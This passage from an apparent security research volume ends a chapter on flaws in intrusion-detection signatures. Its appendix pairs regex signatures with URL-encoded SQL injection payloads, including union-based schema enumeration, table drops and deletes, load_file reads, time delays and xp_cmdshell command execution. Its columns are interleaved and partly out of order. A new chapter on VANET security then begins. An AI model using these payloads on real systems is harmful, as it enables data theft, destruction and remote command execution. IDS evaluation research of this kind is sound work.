Web Server Attacks. In NDSS.
2. Bau, J., Bursztein, E., Gupta, D., & Mitchell, J. (2010, May). State of the art: Automated
black-box web application vulnerability testing. In Security and Privacy (SP), 2010 IEEE
Symposium on (pp. 332-345). IEEE.
4. Depren, O., Topallar, M., Anarim, E., & Ciliz, M. K. (2005). An intelligent intrusion
detection system (IDS) for anomaly and misuse detection in computer networks. Expert
systems with Applications, 29(4), 713-722.
5. Heberlein, L. T., Dias, G. V., Levitt, K. N., Mukherjee, B., Wood, J., & Wolber, D. (1990,
May). A network security monitor. In Research in Security and Privacy, 1990.
Proceedings., 1990 IEEE Computer Society Symposium on(pp. 296-304). IEEE.
7. Kim, H. A., & Karp, B. (2004, August). Autograph: Toward Automated, Distributed Worm
Signature Detection. In USENIX security symposium (Vol. 286).
8. Kruegel, C., & Vigna, G. (2003, October). Anomaly detection of web-based attacks. In
Proceedings of the 10th ACM conference on Computer and communications security
(pp. 251-261). ACM.
9. Massicotte, F., & Labiche, Y. (2011, June). An analysis of signature overlaps in Intrusion
Detection Systems. In Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st
International Conference on (pp. 109-120). IEEE.
10. Massicotte, F., & Labiche, Y. (2012, November). On the Verification and Validation of
Signature-Based, Network Intrusion Detection Systems. In Software Reliability
Engineering (ISSRE), 2012 IEEE 23rd International Symposium on (pp. 61-70). IEEE.
11. Mell, P., Hu, V., Lippmann, R., Haines, J., & Zissman, M. (2003). An overview of issues in
testing intrusion detection systems.
12. Milenkoski, A., Vieira, M., Kounev, S., Avritzer, A., & Payne, B. D. (2015). Evaluating
computer intrusion detection systems: A survey of common practices. ACM Computing
Surveys (CSUR), 48(1), 12.
216
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
References:
13. Morgan, D. (2006). Web application security–SQL injection attacks. Network security,
2006(4), 4-5.
14. Puketza, N. J., Zhang, K., Chung, M., Mukherjee, B., & Olsson, R. A. (1996). A methodology
for testing intrusion detection systems. IEEE Transactions on Software Engineering,
22(10), 719-729.
15. Roesch, M. (1999, November). Snort: Lightweight intrusion detection for networks. In
Lisa (Vol. 99, No. 1, pp. 229-238).
16. Roschke, S., Cheng, F., & Meinel, C. (2009, August). An extensible and
virtualization-compatible IDS management architecture. In Information Assurance and
Security, 2009. IAS'09. Fifth International Conference on (Vol. 2, pp. 130-134). IEEE.
18. Stakhanova, N., & Ghorbani, A. A. (2010, April). Managing intrusion detection rule sets. In
Proceedings of the Third European Workshop on System Security (pp. 29-35). ACM.
19. Tang, Y., & Chen, S. (2007). An automated signature-based approach against
polymorphic internet worms. IEEE Transactions on Parallel and Distributed Systems,
18(7).
20. Vaidya, V. (2001). U.S. Patent No. 6,279,113. Washington, DC: U.S. Patent and Trademark
Office.
21. Vigna, G., Robertson, W., & Balzarotti, D. (2004, October). Testing network-based
intrusion detection signatures using mutant exploits. In Proceedings of the 11th ACM
conference on Computer and communications security (pp. 21-30). ACM.
22. Wani, M. A., Agarwal, N., Jabin, S., & Hussai, S. Z. (2018). Design and Implementation of
iMacros-based Data Crawler for Behavioral Analysis of Facebook Users. arXiv preprint
arXiv:1802.09566.
23. Wassom, D. (2003). Intrusion Detection Systems: An Overview of Real Secure. SANS
Institute, October.
217
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
References:
25. Yegneswaran, V., Giffin, J. T., Barford, P., & Jha, S. (2005, August). An Architecture for
Generating Semantic Aware Signatures. In USENIX Security Symposium (pp. 97-112).
26. Zanero, S. (2007). Flaws and frauds in the evaluation of IDS/IPS technologies. In Proc. of
FIRST.
27. Zheng, M., Sun, M., & Lui, J. C. (2013, July). Droid analytics: A signature based analytic
system to collect, extract, analyze and associate android malware. In Trust, Security and
Privacy in Computing and Communications (TrustCom), 2013 12th IEEE International
Conference on (pp. 163-171). IEEE.
218
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Appendix A
]) %20||user()
S8 (?:[^\w\s]\w+\s %20and%20(select(1|%221%20%20%22))
*[|-]\s*"\s*\w) %20and%20(1|%221%20%20%22)
(1|%221%20%20%22)
219
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
%20order%20by%20(1|%221%20%20%22)
%20group%20by%20(1|%221%20%20%22)
S9 (?:@\w+\s+(and (@1%20or%201|%221%20%20%22)
|or)\s*["\d]+) %20xor%20@1%20and%20%221%22
@@version%20and%20%221%22
%20having%20@@version%20and%20%221%22
%20group%20by%20@@version%20and%20%221%22
S10 (?:@[\w- %20or%20@1%20and%20(%221%22)
]+\s(and|or)\s*[ %20or%20@1%20and%20%22(1)%22
^\w\s]) %20order%20by%20@1%20and%20(%221%22)
%20group%20by%20@1%20and%20(%221%22)
%20having%20@1%20and%20(%221%22)
S11 (?:[^\w\s:]\s*\d\ %20or%20(5=(%22k%22))
W+[^\w\s]\s*".) %20||%20(5=(%22k%22))
%20having%20(5=(%22k%22))
%20group%20by%20(5=(%22k%22))
%20or%20(5!=%20(%22k%22))
S12 (?:\Winformatio (1)%20union%20select%201,table_name,1%20from%20information_schema.tables
n_schema|table (1)%20union%20select%201,column_name,1,1,1,1%20from%20information_schema.colu
_name\W) mns
(1)%20union%20/**/select%201,table_name,1%20from/**/%20information_schema.tabl
es
(1)%20union%20(select%201,table_name,1%20from%20information_schema.tables)
(1)%20union%20(select%201,concat(table_name,1),1,1,1,1%20from%20information_sch
ema.tables)
S13 (?:"\s*\*.+(?:or| %20or%20%22*%22%20or%20%221%20%22
id)\W*"\d) %20or%20%22*%22%20id=%20%221%20%22
%20or%20%22*%22%20or%20!%20%221%20%22
%20or%20%22*%22%20or%20(%20%221%20%22)
%20or%20%22*%22%20or%20/**/(%20%221%20%22)
S14 (?:\^") %20or%20%22^%22
%20group%20by%20%22^%22
%20having%20%20%22^%22
%20||%20%20%22^%22
%20xor%20%20%22^%22
S15 (?:"[\s\d]*[^\w\s or 'a' ='5'
]+\W*\d\W*.*[ %20or%20%22a%22%20=(55)
"\d]) %20||%20%22a%22%20=%225%22
%20xor%20%22a%22%20=(55)
%20group%20by%20%22a%22%20=(55)
S16 (?:"\s*[^\w\s?]+ or '/* */' or 1
\s*[^\w\s]+\s*") (1)%20or%20%22A%22%3C=%22B%22
(1)%20or%20%22C%22%3C=%22B%22
(1)%20or%20%22C%22||%22B%22
(1)%20or%20%22C%22!=%22B%22
S17 (?:"\s*[^\w\s]+\ %20or%20%22%201%22%3E5--
s*[\W\d].*(?:#|- %20or%20%22%201%22%3E@5--
-)) %20or%20%22%201%22%3E@5--
%20or%20%22%201%22%20||%20@version--
%20or%20%22%201%22%20||%201%20group%20by%20@version--
S18 (?:".*\*\s*\d) %20or%20%22*1%22
%20xor%20%22*1%22
%20order%20by%20%22*1%22
%20union%20select%20%20%22*1%22
220
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
%20union%20/**/select%20%20%22(*1)%22
S19 (?:"\s*or\s[^\d] %20or%20%22*%22%20or%20id=%225%22
+[\w-]+.*\d) %20or%20%22%20%22%20or%20(5)
%20or%20%22%20%22%20or%20@version%3E5
%20or%20%22%20%22%20or%20@version
%20or%20%22%20%22%20or%20@1
S20 (?:[()*<>%+- %20group%20by%20%22(2)%22--
][\w- %20group%20by%20%22(a)%22--
]+[^\w\s]+"[^,]) %20order%20by%20%20%22(a)%22--
%20||%20%22(2)%22--
%20union%20select%20%22(2)%22--
S21 (?:^admin\s*"|(\ admin%22%20or%20%221
/\*)+"+\s?(?:-- admin%22%20and%20%221
|#|\/\*|{)?) ad%22%20and%20%221%22%20/*%22*/--%20h
%20and%200%20/*%22*/
%20and%200%20/*%22%22*/--
S22 (?:"\s*or[\w\s- %20or%20%221%20%22%20or%20(5)
]+\s*[+<>=(),- %20or%20%221%20%22%20or%203%3E5
]\s*[\d"]) %20or%20%221%20%22%20or%203-5
%20or%20%221%20%22%20or%20id-5
%20or%20%221%20%22%20or%20id=5
S23 (?:"\s*[^\w\s]?= %20or%20%221%20%22%20%3E=%20%22%202%22
\s*") %20or%20%221%20%22%20=%20%22%202%22
%20or%20%221%20%22%20!=%20%22%202%22
%20order%20by%20%221%20%22%20!=%20%22%202%22
%20having%20%221%20%22%20!=%20%22%202%22
S24 (?:"\W*[+=]+\ %20or%20%221%20%22=%22%201%22
W*") %20or%20%221%20%22%3E=%22%201%22
%20||%20%221%20%22%3E=%22%201%22
%20order%20by%20%221%20%22%3E=%22%201%22
%20group%20by%20%221%20%22%3E=%22%201%22
S25 (?:"\s*[!=|][\d\s! %20or%20%221%20%22=%222%22
=+-]+.*["(].*$) %20or%20%221%20%22%20!=%222%22
%20union%20select%20%221%20%22%20%20=%222%22
%20union%20select%20(%221%20%22%20%20=%222%22)
%20union%20/**/select%20%221%20%22%20%20=%222%22
S26 (?:"\s*like\W+) %20or%20%22a%22%20like%20%22a%22
%20or%20%22a%22%20like%20%22b%22
%20and%20%22a%22%20like%20%22b%22
%20and%20(Select%20%22a%22%20like%20%22b%22)
%20||%20(Select%20%22a%22%20like%20%22a%22)
S27 (?:where\s[\s\w\ %201%20union%20select%201%20from%20test%20where%201%20=1
.,-]+\s=) ;%20delete%20from%20product_tbl%20where%20id%20=4%20--
1;%20;update%20product_tbl%20set%20name%20=%20%27shirt%27%20where%20id%
20=1%20--
1; delete from product_tbl where 1 = 1
1; delete from product_tbl where 2 = 1
S28 (?:"[<>~]+") 5%20or%20%22b%22%3C%22a%22
5%20or%20%22a%22%3C%22b%22
5%20or%20%22(a)%22%3C%22(b)%22
5%20having%20%22(a)%22%3C%22(b)%22
5%20having%20%22(a)%22%3E%22(b)%22
S29 (?:union\s*(?:all %20union%20select%20(%22a$%22)
|distinct|[(!@]*) %20union%20select%20(%22a%22%3E%22b%22)
221
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
?\s*[([]*\s*sele %20union%20all%20select%201,1,1
ct) %201%20union%20select%201%20from%20test%20where%201=1
%20union%20distinct%20select%20(%22%a$%22)
S30 (?:\w+\s+like\s) %20or%20@1%20like%20%221%22
%20and%20@1%20like%20%221%22
%20group%20by@1%20like%20%221%22
%20order%20by@1%20like%20%221%22
%20^%20(Select@1%20like%20%221%22)
S31 (?:like\s*"\%) %20or%20%22a%22%20like%20%22%%22
%20or%20(%22a%22)%20like%20%22%%22
%20or%20(select((%22a%22)like%20%22%%22))
%20or%20(select(1%20like%20%22%%22))
%20and%20(select(1%20like%20%22%%22))
S32 (?:"\s*like\W*[ %20or%20%22a%22%20like%20%22a%%22
"\d]) %20and%20%22a%22%20like%20%22a%%22
%20||%20%22a%22%20like%20%22a%%22
%20||%20%22a%22like%20%22a%%22
%20having%20%22a%22like%20%22a%%22
S33 (?:"\s*(?:n?and| %20or%20%221%20%22%20%20xor%201=1%20having%201
x?or|not %20or%20%221%20%22%20%20and%201=1%20having%201
|\|\||\&\&)\s+[\s\ %20and%20%221%20%22%20%20and%20a=1%20%20having%201
w]+=\s*\w+\s* %20||%20%221%20%22%20%20||%201=1%20%20having%201
having)
%20or%20%221%20%22%20%20||%201=1%20%20having%201
S34 (?:"\s*\*\s*\w+\ %20or%20%22*a$%22
W+") %20||%20%22*a$%22
%20||%20%22*a%22=%22a%22
%20||%20%22*a%22%3E=%22a%22
%20||%20%22*a%22!=%22a%22
S35 (?:"\s*[^?\w\s=. %20xor%20%221%20%22%3E1||1
,;)(]+\s*[(@"]*\ %20xor%20%221%20%22-1||-1
s*\w+\W+\w) %20and%20%221%20%22-1||-1
%20and%20%222%20%22%3E%221%22||(0)
%20and%20%22b%22%3E%22a%22||(0)
S36 (?:select\s*[\[\]( %20union%20all%20select%201,1,1,1,1,1%20from%20a
)\s\w\.,"- %20union%20distinct%20select%201,1,1,1,1,1%20from%20a
]+from) %20union%20distinct%20/**/select%201,1,1,1,1,1%20from%20a
%20union%20distinct%20/**/select%20(1)%20,1,1,1,1,1%20from%20a
%20union%20distinct%20/**/select%2010,%221%22,1,1,1,1%20from%20a
S37 (?:find_in_set\s %20or%20find_in_set(%22a%22,%22a,b%22)
*\() %20or%20find_in_set(%22a%22,NULL)
%20order%20by%20find_in_set(%22a%22,NULL)
%20group%20by%20find_in_set(%22a%22,NULL)
%20union%20select%20find_in_set(%22a%22,NULL)
S38 (?:in\s*\(+\s*sel %20or%201%20in%20(select%201)
ect) %20and%201%20in%20(select%201)
%20and%201%20in%20(select%20%22@1%22)
%20order%20by%201%20in%20(select%20%22@1%22)
%20having%201%20in%20(select%20%22@1%22)
S39 (?:(?:n?and|x?or %20or%201%20regexp%20(%22\W%22)
|not %20or%200%20union%20select%201%20regexp%20(%22\W%22),1,1,1,1,1
|\|\||\&\&)\s+[\s\ %20or%200%20union%20select%201%20regexp%20(%22\W%22),1,1,1,1,1
w+]+(?:regexp\ %20or%200%20union%20select%201%20regexp%20(%22\W%22),%201%20regexp%2
s*\(|sounds\s+li 0%22\d%22,3,4,5,6
ke\s*"|[=\d]+x))
%20or%20%201%20sounds%20like%20%22%200%22
222
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
rt|desc)) 1;truncate%20table%20hacker
S45 (?:(?:select|creat %20union%20select%20char(%22A%22)
e|rename|truncat %20union%20select%20group_concat(%22A%22)
e|load|alter|delet %20union%20select%20group_concat(%22A%22,%22B%22)
e|update|insert|d %20union%20select%20group_concat(%22A%22,(%22B%22))
esc)\s+(?:(?:gro
up_)concat|char|
load_file)\s?\(?) %20union%20select%20char(1)
S46 (?:end\s*\);) %20union%20select%20(case%20when%201%20then%201%20end);
%20union%20select%20(case%20%22A%22%20when%20TRUE%20then%20FALSE%
20end);
%20union%20select%20(case%20%22A%22%20when%20TRUE%20then%20FALSE%
20else%200%20end);
%20union%20select%20(case%20%22A%22%20when%201-2%20then%20(2-
3)%20else%200%20end);
%20union%20all%20/**/select%20(case%20%22A%22%20when%201||2%20then%20(2
-3)%20else%200%20end);
S47 ("\s+regexp\W) %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a
%22%20regexp%20(%22a%22)
%20union%20all%20select%201,2,3,4,%22a%22%20regexp%20%22b%22,5
%20union%20all%20select%201,2,3,4,%22a%22%20regexp%20(1),5
%20or%20%22a%22%20regexp%20(1)
%20||%20(%22a%22%20regexp%20(%22a%22))
S48 (?:[\s(]load_file\ %20union%20select%201,2,3,4,5,%20load_file(%22C:/xampp/tmp/test.txt%22)
s*\() %20or%20load_file(%22C:/xampp/tmp/test.txt%22)
%20or%20load_file(%22C:/xampp/tmp/test1.txt%22)
%20group%20by%20load_file(%22C:/xampp/tmp/test1.txt%22)
223
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
%20group%20by%20(select(coalesce(1)))
S59 (?:\W!+"\w) %20or%20!%221%22
%20and%20!%221%22
%20order%20by%20(!%221%22)
%20or%201=%20(!%221%22)
%20and%201=%20(!%221%22)
S60 (?:order\s+by\s %20order%20by%20if(1,1,1)
+if\w*\s*\() %20order%20by%20if(user(),1,1)
%20order%20by%20if(user(),TRUE,FALSE)
%20order%20by%20if(1|1,TRUE,FALSE)
%20order%20by%20if((1%3E1),TRUE,FALSE)
S61 (?:[\s(]+case\d*\ %20xor%20(select%20case%20%22A%22%20when%201%20then%200%20end)
W.+[tw]hen[\s(] %20xor%20(select%20case%201%20when%201%20then%200%20end)
) %20and%20(select%20case%201%20when%201%20then%200%20end)
%20union%20select%20case%20@1%20when%201%20then%200%20end,1,2,3,4,5
%20nand%20select%20concat(case%20@1%20when%201%20then%200%20end,1)
S62 (?:(select|;)\s+(? %20union%20select%20sleep(5),2,3,4,5,6
:benchmark|if|sl %20or%20(select%20sleep(4))
eep)\s*?\(\s*\(?\ %20or%20(select%20if(1,1,1))
s*\w+) %20union%20(select%20if(1,1,1))
%20union%20select%20benchmark(100000,1%3E2),2,3,4,5,6
S63 (?:;\s*(?:select|c 1;%20Select%20234
reate|rename|tru 1;%20Select%20(234)
ncate|load|alter| 1;%20update%20product_tbl%20set%20name=%27top%27%20where%20id=1
delete|update|in 1;%20create%20table%20test2%20(id%20int)
sert|desc)\s*[\[(]
?\w{2,}) 1;%20insert%20into%20test2%20values(5)
S64 (";\s*waitfor\s+ 1%20or%20%221%22;%20waitfor%20time%20%2200:00:00%22
time\s+") 1%20or%20%221%22;%20waitfor%20time%20%22(00:00:00)%22
1%20and%20%221%22;%20waitfor%20time%20%22(00:00:00)%22
1%20and%20%221%22;%20waitfor%20time%20%22((00:00:00))%22
1%20xor%20%221%22;%20waitfor%20time%20%22((00:00:00))%22
S65 (?:procedure\s+ %20procedure%20analyse(1)
analyse\s*\() %20procedure%20analyse()
%20limit%201,1%20procedure%20analyse()
%20limit%206,1%20procedure%20analyse()
%20limit%206,1%20procedure%20analyse(1,1)
S66 (?:;\s*(declare|o 1%20;%20DECLARE%20my_cursor%20CURSOR%20FOR%20SELECT%20*%20FRO
pen)\s+[\w-]+) M%20product_tbl%20OPEN%20my_cursor%20FETCH%20NEXT%20FROM%20my_c
ursor;
1%20;use
test;%20DECLARE%20my_cursor%20CURSOR%20FOR%20SELECT%20*%20FROM
%20product_tbl%20OPEN%20my_cursor%20FETCH%20NEXT%20FROM%20my_curs
or;
1%20;%20DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%20EM
P_ID,%20RANDOM_GEN_NO%20FROM%20SAMPLE_EMPLOYEE%20FOR%20UP
DATE%20OF%20RANDOM_GEN_NO%20OPEN%20EMP_CURSOR
1%20;%20DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%201,1,1
%20%20OPEN%20EMP_CURSOR
1%20;%20use test;
DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%201,1,1%20%20O
PEN%20EMP_CURSOR
S67 (?:declare[^\w] 1%20;USE%20test%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@
+[@#]\s*\w+)|( sql=%20%27CREATE%20PROCEDURE%20dbo.sp_bar2%20AS%20BEGIN%20SELE
224
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
%20order%20by%20load_file(%22C:/xampp/tmp/test1.txt%22)
S49 (?:@.+=\s*\(\s* %20union%20distinct%20select%201,2,3,4,5,6%20from%20product_tbl%20where%20@
select) id%20=%20(select%201)
%20or%20@id%20=%20(select%201)
%20having%20@id%20=%20(select%201)
%20group%20by%20@id%20=%20(select%201)
%20order%20by%20@id%20=%20(select%201)
S50 (?:\d+\s*or\s*\d %20or%201-1
+\s*[\-+]) %20||%201%20or%201-1
%20and%201%20or%201-1
%20|%201%20or%201-1
%20xor%201%20or%201-1
S51 (?:\d\s+group\s %20group%20by%20(2)
+by.+\() %20group%20by%20(7)
%20or%201%20group%20by%20(6)
%20and%201%20group%20by%20(6)
%20%20group%20by%20(6)%20having%201
S52 (?:(?:;|#|-- 1%20;%20drop%20table%20A
)\s*(?:drop|alter 1%20;%20alter%20table%20abc%20drop%20column%20id
)) 1%20;%20alter%20table%20abc%20add%20id2%20int
1%20;%20drop%20table%20test2.dbo.abc
1%20;%20alter%20table%20abc%20drop%20column%20id2
S53 (?:(?:;|#|-- 1%20;update%20%20abc%20set%20id=5%20where%20id=1
)\s*(?:update|in 1%20;update%20%20abc%20/**/set%20id=10%20where%20id=5
sert)\s*\w{2,}) 1%20;insert%20into%20abc%20values(23);
1%20;%20insert%20into%20abc%20values(%2225%22,%221%22)
1%20;%20insert%20into%20/**/abc%20values(27)
S54 (?:(?:n?and|x?or %20or%20%221%22%20=%20%22%202%22
|not %20or%201=(1)
|\|\||\&\&)[\s(]+\ %20or%201=%22%201%22
w+[\s)]*[!=+]+[ %20and%201=%22%201%22
\s\d]*["=()])
%20and%20(1=%221%22)
S55 (?:\(\s*select\s*\ %20union%20(select%20user(),user(),1,1,1,1)
w+\s*\() %20union%20(select%20version())
%20union%20(select%20version(),2,3,4,5,6)
%20or%20(select%20version())
%20and%20(select%20version())
S56 (?:\*\/from) %20or%20id%20=(select%201%20/**/from%20product_tbl%20limit%201)
%20or%20id%20=(select%201%20/**/from%20product_tbl%20where%201%20limit%2
01)
%20and%20id%20=(select%201%20/**/from%20product_tbl%20where%201%20limit%
201)
%20union%20(select%201,2,3,4,5,6%20/**/from%20product_tbl%20where%201%20lim
it%201)
%20union%20(select%201,2,3,4,5,6%20/**/from%20product_tbl%20%20limit%201)
S57 (?:\w"\s*(?:[- %20or%20%22a%22%20=(5)
+=|@]+\s*)+[\d %20or%20%22a%22%20=5
(]) %20or%20%22a%22%20|(@user)
%20and%20%22a%22%20-(%22b%22)
%20and%20%22c%22=%20(%22c%22)
S58 (?:coalesce\s*\(| (1)%20or%20coalesce%20(NULL)
@@\w+\s*[^\w %20or%20coalesce%20(NULL,1)
\s]) %20and%20coalesce%20(NULL)
%20or%20(select(coalesce(1)))
225
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
exec\s*\(\s*@) CT%20%27%27a%27%27%20END;%20%27;%20EXEC%20test.dbo.sp_executesql%20
@sql;
1%20;USE%20test%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@
sql=%20%27CREATE%20PROCEDURE%20dbo.sp_bar3%20AS%20BEGIN%20SELE
CT%20%27%27a%27%27%20END;%20%27;%20EXEC%20sp_executesql%20@sql;
1%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%20%27CRE
ATE%20PROCEDURE%20dbo.sp_bar4%20AS%20BEGIN%20SELECT%20%27%27a
%27%27%20END;%20%27;%20EXEC%20sp_executesql%20@sql;
1%20;use%20test;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%
27Create%20Function%20TL()%20returns%20int%20as%20Begin%20return%201;%20e
nd;%27%20EXEC%20sp_executesql%20@sql;
1%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%27Create%
20Function%20TLS()%20returns%20int%20as%20Begin%20return%201;%20end;%27%
20EXEC%20sp_executesql%20@sql;
S68 (?:waitfor\s*del 1%20;%20waitfor%20delay%2700:00:01%27
ay\s?'+\s?\d) 1%20;%20waitfor%20delay%27%2000:00:01%27
1%20;Begin%20waitfor%20delay%27%2000:00:04%27%20end;
1%20;Begin%20waitfor%20delay%2700:00:04%27%20end;
1%20;%20/**/waitfor%20delay%2700:00:02%27%20%20
S69 (?:\sexec\s+xp_ 1%20;%20EXEC%20xp_cmdshell%20%27dir%20*.exe%27;
cmdshell) 1%20;%20EXEC%20xp_cmdshell%20%27COPY%20C:\xampp\test.txt%20C:\xampp\tes
t4.txt%27;
1%20;%20EXEC%20xp_cmdshell%20%27whoami.exe%27
1%20;%20EXEC%20xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;
1%20;%20EXEC%20xp_cmdshell%20print%27h%27;
S70 (?:from\W+info %20union%20select%201,table_name,3,4,5,6%20from%20information_schema.tables
rmation_schem %20union%20select%201,table_name,3,4,5,6%20from%20information_schema.tables%2
a\W) 0limit%202
%20union%20distinctrow%20select%201,table_name,3,4,5,6%20from%20information_sc
hema.tables%20
%20union%20distinctrow%20select%201,table_name,3,4,5,6%20from%20information_sc
hema.tables%20where%20table_schema=%27test%27
%20union%20distinctrow%20select%201,table_name,3,4,5,6%20%20from%20informatio
n_schema.tables%20where%20table_schema=%27test%27
S71 (?:(?:(?:current_ %20union%20distinctrow%20select%201,user(),3,4,5,6%20
)?user|database| %20union%20distinctrow%20select%201,database(),3,4,5,6%20
schema|connect %20union%20distinctrow%20select%201,current_user(),3,4,5,6%20
ion_id)\s*\([^\)] %20or%20user()
*)
%20and%20schema()
S72 (?:;?\s*(?:select| 1%20or%20%271%27=%271%27;select(1)
union|having)\s 1%20or%20%271%27=%271%27union%20select%201,%27A%27
*[^\s]) %20or%20%221%22=%221%22%20union%20distinctrow%20select%201
%20or%20%221%22=%221%22%20having%201
%20or%20%221%22=%221%22%20having%201%20and%201
S73 (?:exec\s+maste 1%20;EXEC%20master.dbo.xp_cmdshell%20%27COPY%20C:\xampp\test.txt%20C:\xa
r\.) mpp\test4.txt%27;
1%20;%20EXEC%20master.dbo.xp_cmdshell%20%27whoami.exe%27
1%20;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;
1%20;reconfigure;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\test4
.txt%27;
1%20;%20reconfigure;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\
test4.txt%27;
S74 (?:union select %20union%20select%20@version,2,3,4,5,6
@) %20union%20select%20@version,2,3,4,5,6
226
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
%20union%20select%20@user
%20/**/union%20select%20@user
%20/*!union%20select%20@user,2,3,4,5,6*/
S75 (?:\W+\d*\s*ha %20or%20(1)%20having%201
ving\s*[^\s\-]) %20and%20(1)%20%20having%201
(1)%20%20%20having%201
(1)%20%20%20or%221%22%20having%201
(1)%20%20%20||%221%22%20having%201
S76 (?:,.*[)\da- %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a
f"]"(?:".*"|\Z|[^ %22regexp%20%22b%22
"]+)) %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a
%22%20||%20%22b%22
%20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%2212
3%22%20||%20%22b%22
%20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a
%22
%20union%20all%20select%201,1,1,1,1,%22a%22
S77 (?:\Wselect.+\ %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%200
W*from) %20union%20all%20/**/select%201,1,1,1,1,1%20from%20product_tbl%20where%200
%20union%20distinctrow%20select%201,1,1,1,1,1%20from%20product_tbl%20
%20or%20(select%200%20from%20product_tbl%20limit%201)
1%20;%20select%201%20from%20test2
S78 ((?:select|create| %201%20union%20all%20select%20(space(3)),1,1
rename|truncate| %201%20or%20(select(space(1)))
load|alter|delete| 1%20;%20select(space(1))
update|insert|de 1%20;/**/%20Select(space(1))
sc)\s*\(\s*space
\s*\() 1%20||/**/%20Select(space(1))
S79 (?:--[^\n]*$) 1%20--%20h
1;%20--%20h
1;%20Select%201%20--%20h
%201%20or%20%221%22%20--
%20or%200%20--
S80 (?:\<!-|-->) %20or%200%20%3C!--
%20or%200%20--%20%3C!----%3E
%20or%200%20--%20%3C!--
%20and%200%20--%20%3C!--
%20and%200%20--%20--%3E
S81 (?:[^*]\/\*|\*\/[^ 1%20;/**/insert%20into%20abc%20values(24)
*]) 1;%20/**/Select%201
%20or%200%20/**/%20and%200
1;%20/**/Select/**/%201
/*!@1*/%20and%20%221%22
S82 (?:(?:[\W\d]#|-- %20or%20%221%22--
|{)$) 1;%20/**/Select/**/%201--
%20or%201%20union%20select%201%20--
%20group%20by%202--
%20%20--
S83 (?:";\s*(?:if|whil 1%20or%20%271%27=%271%27;select(1)"
e|begin)) 1%20or%20%271%27=%271%27union%20select%201,%27A%27
1%20or%20%271%27=%271%27%20union%20distinctrow%20select%201
1%20or%20%271%27=%271%27%20having%201
1%20or%20%272%27%20having%201%20and%201
227
Towards Secure
IoT: Securing
Messages
Dissemination in
Intelligent Traffic
Systems
Jawdat Alshaer
ABOUT THE AUTHOR
Jawdat Alshaer
Jawdat Jamil Alshaer: Received the BSc degree from the Department of
Computer Science, Mu’ta University, Jordan, in 1993, MSc degree from the
229
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
A few years ago, the automotive area in the IoT was seen as a theoretical concept and today we are already seeing the
possibilities of not only driverless cars, but applications of IoT in the intelligent vehicles including parking,
maintaining environment, protecting lives and smoothing the flow of vehicle movements. We have realized the urgent
need of using simple and efficient secure protocols in the Vehicular Ad Hoc Network (VANET) to be practical in the
fast mobility of the network nodes, and take advantage of the existence of base stations gateways along the road to
inherit the protocol from different VANETs. This will reduce the initialization of communication overhead time and
the security key initialization each time a node passes to a new base station zone. In this research, we applied security
protocols used in sensor networks to achieve security in VANET. The simulation analysis shows that secure practical
communication is achieved, which can be passed to other sub VANETs. The contribution of this article is enhancing
proposed protocols with as little cryptography computation overhead as possible to make it applicable in the high
mobility nature of VANET using security primitives; this guarantees security and allows fast authentication while a
vehicle is passing from one VANET to the next, depending on its direction in the transportation networks.
1. INTRODUCTION
Internet of Things (IoT) is a new internet technology wave transforming human lives. The traditional internet, which
is used to connect people, now has been extended to connect things. This will provide communication to intelligent
service pooling, using low cost internet connected devices and sensors while applying intelligent algorithms. These
days, people’s lives and jobs require them continuously to be both mobile and online, even when they are onboard
driving a vehicle. The diagnostics OBD/OBD-II port (which is like a computer) monitors emissions, mileage, speed,
and engine functionalities, besides road traffic and conditions. This information can be displayed on special screens or
sent to service specialists for analysis. Alerts related to the vehicle, like open doors, lights on and hand brake, or
related to the trip conditions, require the driver or automated vehicle control to perform actions on certain vehicle
parts, such as lock/unlock vehicle doors, start the ABS system and, in some cases, to safely stop the vehicle. Vehicles
may also be equipped with GPS, Gyroscopes Orientation and Accelerometer Sensors, which can be used to model the
driving behavior.
Safety Sensors are the basis of safety systems and focus on recognizing accident hazards and events almost in
real-time.
By mounting the specific equipment in the vehicle, sensors readings can be processed to match driving patterns with
road conditions, such as icy roads, turns, obstacles and traffic jams. Monitoring different parameters actively while
processing and intelligently analyzing sensor readings, drivers can get real time alerts and warnings on their screens
and smart devices, and technical faults can be identified for early handling. By allowing Vehicular Ad hoc Networks
(VANETs) between vehicles, Roadside Units (RSU), and a Base Station (BS) as in figure 1, some useful information
regarding road status and emergency situations can be readily made available to other vehicles, government
authorities, and service stations; this will enable better traffic performance and leads to saving lives.
230
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
NETWORK ARCHITECTURE
The purpose of this research is to achieve a Secure Intelligent Transportation System (SITS). A layered structure of
VANET, as in figure 2, gives the ability to isolate the main functionality from the basic infrastructure, and allows
